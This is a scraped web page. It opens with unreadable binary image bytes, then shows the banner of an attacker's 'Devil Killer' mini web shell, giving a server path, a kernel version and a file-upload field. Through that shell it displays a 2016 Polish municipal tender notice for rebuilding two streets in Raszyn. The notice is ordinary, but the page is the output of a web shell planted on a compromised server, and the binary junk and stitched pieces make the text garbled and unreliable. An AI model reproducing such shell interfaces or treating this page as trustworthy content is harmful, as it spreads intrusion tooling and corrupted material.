JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160119/6721-N-2016.html

<p class="kh_header"><b>Raszyn: Przebudowa ulic Reymonta (odc. na wschód od ul. Godebskiego) i Żeromskiego w miejscowości Raszyn</b><br>
<b>Numer ogłoszenia: 6721 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raszyn , ul. Szkolna 2a, 05-090 Raszyn, woj. mazowieckie, tel. 022 7017770, faks 022 7017778.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.raszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic Reymonta (odc. na wschód od ul. Godebskiego) i Żeromskiego w miejscowości Raszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: przebudowa ulic Reymonta (odc. na wschód od ul. Godebskiego) i Żeromskiego w miejscowości Raszyn. 
Przebudowywana ul. Żeromskiego jest podzielona ulicą Godebskiego na część zachodnią i wschodnią, natomiast przebudowana ul. Reymonta obejmuje odcinek na wschód od ul. Godebskiego.

UL. ŻEROMSKIEGO 
a)	odcinek na wschód od ul. Godebskiego:
Roboty drogowe: Zaprojektowano jezdnię o szerokości 5,0 m z kostki betonowej z obustronnym chodnikiem na długości ok.  140 m.
-nawierzchnia jedni : warstwa ścieralna z kostki betonowej szarej  gr. 8 cm na podsypce grysowej gr. 5 cm, typ BEHATON, na podbudowie z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm, podbudowie pomocniczej z piasku stabilizowanego cementem Rm=2,5 MPa gr. 12 cm (mieszanka dowożona)
-nawierzchnia zjazdów: warstwa ścieralna z kostki betonowej czerwona gr. 8 cm na podsypce gryzowej gr. 5 cm, typ BEHATON, na podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 15 cm, podbudowie pomocniczej z piasku stabilizowanego cementem Rm=2,5 MPa gr. 12 cm (mieszanka dowożona),
-nawierzchnia chodników (ok. 296 m2) : warstwa ścieralna z kostki betonowej szara gr. 8 cm na podsypce cementowo- piaskowej gr. 3 cm, typ BEHATON, podbudowie zasadniczej z piasku stabilizowanego cementem Rm=2,5 MPa gr. 15 cm (mieszanka dowożona),
Odwodnienie:
Dla potrzeb odprowadzenie wód opadowych z ul. Żeromskiego na wschód od ul. Godebskiego zaprojektowano przebudowę kanału deszczowego.
W ramach przedmiotowej inwestycji przewiduje się wykonanie :
- kanału z rur PVC-U  DN  200 mm-  63 m
- wpusty uliczne betonowe o śr. 500 z osadnikiem bez syfonu - 4 szt. 

Sieć  i przyłącza wodociągowe:
Zaprojektowano przebudowę istniejącej sieci i przyłączy wodociągowych w zakresie:
- sieci wodociągowe PE DN110- 123 m, 
- przyłącza wodociągowe PE DN 40- 42 m, 
- hydranty p.poż. DN80- 1szt.
Na odcinku przejścia przez ul. Godebskiego sieć wodociągową zaprojektowano w rurze osłonowej stalowej o średnicy DN200 na długości 9 m.

b)	odcinek na wchód od ul. Godebskiego
Roboty drogowe: Zaprojektowano ciąg pieszo- jezdny z kostki betonowej na długości ok. 260 m.
-nawierzchnia jezdni : warstwa ścieralna z kostki betonowej szarej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 8 cm, dolnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  31,5/63 gr. 12 cm, pospółce  10 cm,
-nawierzchnia chodników i opasek: warstwa ścieralna z kostki betonowej szarej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 15 cm, pospółce 10 cm,
-nawierzchnia zjazdów i zatok parkingowych: warstwa ścieralna z kostki betonowej czerwonej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 15 cm, pospółce 10 cm,

Odwodnienie:
W związku z złym stanem technicznym wpustów ulicznych oraz przykanalików na odcinku od ul. Prostej do posesji nr 25 (W1, W2)  zaprojektowano ich wymianę (2 szt.)  Studnię S3 należy przebudować poprzez wymianę płyty żelbetowej oraz poprzez dobudowę pierścienia odciążającego.
 Na odcinku od posesji nr 25 do ul. Godebskiego przewidziano budowę kanalizacji deszczowej poprzez wbudowanie:
- rur z PVC DN 500- 106 m, 
- rur z PVC DN 200- 44,6 m, 
- studzienki wpustowej żelbetowej o DN 500 z osadnikiem- 5 szt 
Łącza ilość wbudowania studzienek wpustowych żelbetowej o DN 500 z osadnikiem na odcinku objętym przebudową - 7 szt.
 
Sieć  i przyłącza wodociągowe:
Nową trasę przewodu wodociągowego zaprojektowano po śladzie istniejącego wodociągu w zakresie:
- sieci wodociągowe PE- HD 110- 267,24 m, 
- przyłącza wodociągowe PE- HD 40- 47,14 m, 
- przyłącza wodociągowe PE- HD 50- 1,62 m.
Na przewodzie zamontować hydranty p. poż. DN 80 (6 szt.) podziemne z samoczynnym odwodnieniem, podwójnym zamknięciem na ciśnienie PN16, zlokalizowane bezpośrednio na przewodzie wodociągowym.
Zaprojektowano przebudowę istniejących przyłączy wodociągowych w przedmiotowej ulicy w ilości 12 szt. oraz wykonanie nowego przyłącza wodociągowego do posesji nr 6.
 Odcinek wodociągu przechodzący poprzecznie przez ul. Żeromskiego (przy skrzyżowaniu z ul. Prostą należy ułożyć w rurze osłonowej o średnicy 245x4 mm o długości 5, 5 m. Przyłącza wodociągowe na odcinkach przechodzących pod jezdnią układać należy w rurach osłonowych  o średnicy:
- 159x40 mm na długości 36,4 m,
- 178 x40 mm na długości 0,9 m.

UL. REYMONTA NA WSCHÓD OD UL. GODEBSKIEGO 

Roboty drogowe: Zaprojektowano jezdnię o szerokości 5,5 m z kostki betonowej z obustronnymi opaskami o łącznej długości 210 m:
-nawierzchnia jedni : warstwa ścieralna z kostki betonowej szarej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 8 cm, dolnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  31,5/63 gr. 12 cm, pospółce  10 cm,
-nawierzchnia zjazdów: warstwa ścieralna z kostki betonowej czerwonej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 15 cm, pospółce 10 cm,
-nawierzchnia opasek (zmienna szerokość od ok. 0,5-1,6 m): warstwa ścieralna z kostki betonowej szarej  gr. 8 cm na podsypce cementowo- piaskowej gr. 4 cm, typ BEHATON, na górnej podbudowie z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 gr. 15 cm, pospółce 10 cm,

Odwodnienie:

Dla potrzeb odprowadzenie wód opadowych z ul. Reymonta zaprojektowano budowę kanału deszczowego z włączeniem do istniejącej studni zlokalizowanej na skrzyżowaniu z ulicą Godebskiego.
W ramach przedmiotowej inwestycji przewiduje się wykonanie :
- kanału z rur PCV DN 400- 190 m,
- kanału z rur PCV DN 200- 9,2 m,
- studzienki wpustowej żelbetowej o DN 500 z osadnikiem- 7 szt.
- studni żelbetowej rewizyjnej z kręgów betonowych DN 1200 mm - 7 szt.

Sieć  i przyłącza wodociągowe:
Zaprojektowano przebudowę istniejącej sieci wodociągowej z rur PE HD DN110.  Przewód ten włączyć z jednej strony do istniejącego wodociągu DN 100 w ul. Godebskiego, a z drugiej strony do istniejącego wodociągu DN 200 w Al. Krakowskiej. Dodatkowo przebudowane zostaną wszystkie istniejące przyłącza zlokalizowane w granicach pasa drogowego oraz trzy dodatkowe przyłącza wodociągowe do działek, które obecnie nie są zasilanie z wodociągu ul. Reymonta.
Na przewodzie zamontować hydranty p. poż. DN 80 (5 szt.) podziemne z samoczynnym odwodnieniem.

W ramach przedmiotowej inwestycji przewiduje się wykonanie :
- sieci wodociągowe PE- HD DN 110- 219,8 m, 
- przyłącza wodociągowe PE- HD DN 40- 73,75m, 
Odcinek wodociągu przechodzący poprzecznie przez ul. Godebskiego należy ułożyć w rurze osłonowej o średnicy 249x4 mm o długości 6 m. Przyłącza wodociągowe na odcinkach przechodzących pod jezdnią układać należy w rurach osłonowych o średnicy 159x40 mm na długości 46,4 m.

Wykonawca w ramach realizacji wyżej wymienionego zadania zobowiązany jest do:
- uzyskania zezwolenia na zajęcia pasa drogowego oraz poniesienia wszelkich kosztów związanych z prowadzeniem robót w pasie drogi krajowej DK- 7,
- dostarczenia  GDDKiA  Rejon Ożarów Mazowiecki 2 egz. inwentaryzacji geodezyjnej wykonanych robót  w pasie drogi krajowej.
GWARANCJA
Wykonawca udzieli Zamawiającemu min. 36 (trzydzieści sześć) miesięcy gwarancji i min. 36 (trzydzieści sześć) miesięcy rękojmi na przedmiot umowy t.j. na wykonane roboty i wbudowane materiały. Bieg okresu gwarancji i rękojmi rozpoczyna się z dniem podpisania przez strony bezusterkowego protokołu końcowego odbioru przedmiotu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zastrzega możliwość udzielenia zamówień uzupełniających w okresie 3 lat od dnia zawarcia umowy w wysokości do 50% zamówienia podstawowego, przewidzianych w art. 67 ust. 1 pkt. 6 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015, poz. 2164) polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.24.50-1, 45.23.32.52-0, 45.11.27.10-5, 45.23.32.90-8, 45.23.32.21-4, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 40 000,00 zł (słownie: czterdzieści tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
Odnośnie spełniania warunku dotyczącego wiedzy i doświadczenia Zamawiający określa minimalne wymagania wskazując, iż Wykonawca powinien wykazać się wykonaniem w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów (poświadczeń) dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w tym co najmniej:
- 2 (dwóch) robót budowlanych tożsamych w swym zakresie z przedmiotem zamówienia o wartości co najmniej 800 000,00 zł brutto (słownie: osiemset tysięcy złoty) każda z robót tzn. zamówień obejmujących swym zakresem budowę/przebudowę nawierzchni z  kostki betonowej (placu, części drogi tj. jezdni, chodnika bądź ścieżki rowerowej) oraz wykonanie kanalizacji deszczowej/ sanitarnej/ wodociągowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie spełniania warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający określa minimalne wymagania wskazując, iż Wykonawca dysponuje następującymi osobami zdolnymi do wykonania zamówienia:
a)	co najmniej 1 (jedną)  osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej (pełniącą rolę  Kierownika robót), 
b)	co najmniej 1 (jedną) osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (pełniącą rolę Kierownika robót ),
zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tj. Dz. U. nr 83, poz. 578 z późn. zm.). 
W przypadku legitymowania się uprawnieniami wydanymi na podstawie przepisów poprzednio obowiązujących zakres uprawnień powinien odpowiadać w/w specjalnościom.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy powinna zawierać:
a)	wypełniony formularz oferty (oryginał) wraz z kosztorysami ofertowymi sporządzonymi metodą kalkulacji uproszczonej,
b)	pełnomocnictwo (oryginał lub notarialnie poświadczona kopia) do reprezentowania wykonawcy w postępowaniu i złożenia oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności w dokumentach rejestracyjnych lub w przypadku oferty składanej przez Wykonawców występujących wspólnie, pełnomocnictwo dla osoby podpisującej w ich imieniu ofertę (oryginał lub kopia notarialnie poświadczona) ,
c)	dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu, określone w rozdziale VI SIWZ,
d)	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, zgodnie z art. 36b ust. 1 ustawy oraz dołączenia - jeśli dotyczy - wykazu robót budowlanych, które Wykonawca zamierza powierzyć Podwykonawcom /wypełniany w przypadku wykonywania robót budowlanych przez Podwykonawców ,
e)	informacyjnie kserokopia dokumentu potwierdzającego wniesienie wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja i rękojmia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy.
1.	Zamawiający przewiduje możliwość dokonania zmian umowy w przypadku:
1)	wprowadzenia do dokumentacji projektowej w trakcie wykonywania robót, zmian zakwalifikowanych przez Projektanta sprawującego nadzór autorski na podstawie     art. 36a ust. 5 ustawy Prawo budowlane jako nieistotne odstępstwo od projektu, zmiany są  zgodne z zasadami wiedzy technicznej, a roboty, które proponuje się zmienić są objęte projektem budowlanym, 
2)	konieczności wykonania robót zamiennych polegających na zmianie sposobu wykonania jakiegoś  elementu, technologii, lub zmianie cech elementu bez zmiany rodzaju i charakteru robót, a także zmiany celu jaki ma być w ich efekcie osiągnięty tj. nie powodujących rozszerzenia zakresu zamówienia  objętego umową,
3)	 konieczności zaniechania wykonywania części robót,
4)	niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych, uniemożliwiających prowadzenie robót lub w przypadku wystąpienia innych okoliczności dotyczących zmiany terminu określonych w § 2 ust. 5 lub 6,
5)	kolizji z nie zinwentaryzowanym uzbrojeniem podziemnym lub innymi obiektami,
6)	zmiany, rezygnacji lub wprowadzenia nowego Podwykonawcy,
7)	w przypadku ustawowej zmiany stawki podatku VAT w zakresie wynagrodzenia za roboty ujęte w harmonogramie, a niewykonane na dzień obowiązywania nowej stawki.
2.	Zmiana należnego Wykonawcy wynagrodzenia w odniesieniu do robót zaniechanych/zamiennych - w przypadku, o którym mowa w ust. 1 pkt. 1), 2), 3)- ustalona zostanie według następujących zasad:
1)	za podstawę kalkulacji przyjęte zostaną ceny jednostkowe z kosztorysu ofertowego, a ilości robót na podstawie sprawdzonego i zatwierdzonego przez Zamawiającego obmiaru,
2)	jeżeli roboty nie występowały w kosztorysie ofertowym, a są niezbędne do rozliczenia robót zamiennych, podstawą kalkulacji będą:
- dane wyjściowe do kosztorysowania z formularza ofertowego w zakresie kosztów robocizny, narzutu kosztów pośrednich i zysku,
- ceny materiałów i sprzętu nie będą wyższe niż średnie ceny publikowane przez kwartalnik SEKOCENBUD aktualny  na czas ich wbudowania i wykorzystania, a dla materiałów  specjalistycznych wg faktur zakupu,
- nakłady robocizny i nakłady rzeczowe z odpowiednich katalogów (KNR-ów), a dla robót specjalistycznych wg kalkulacji własnej. 
2. Zmiany postanowień zawartej umowy będą dokonywane za zgodą stron wyłącznie na podstawie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.raszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. Szkolna 2a pok. 202A (II piętro ) 
(po wysłaniu zapotrzebowania na nr faksu: 022 701 78 01, 022 701 77 78).</p>
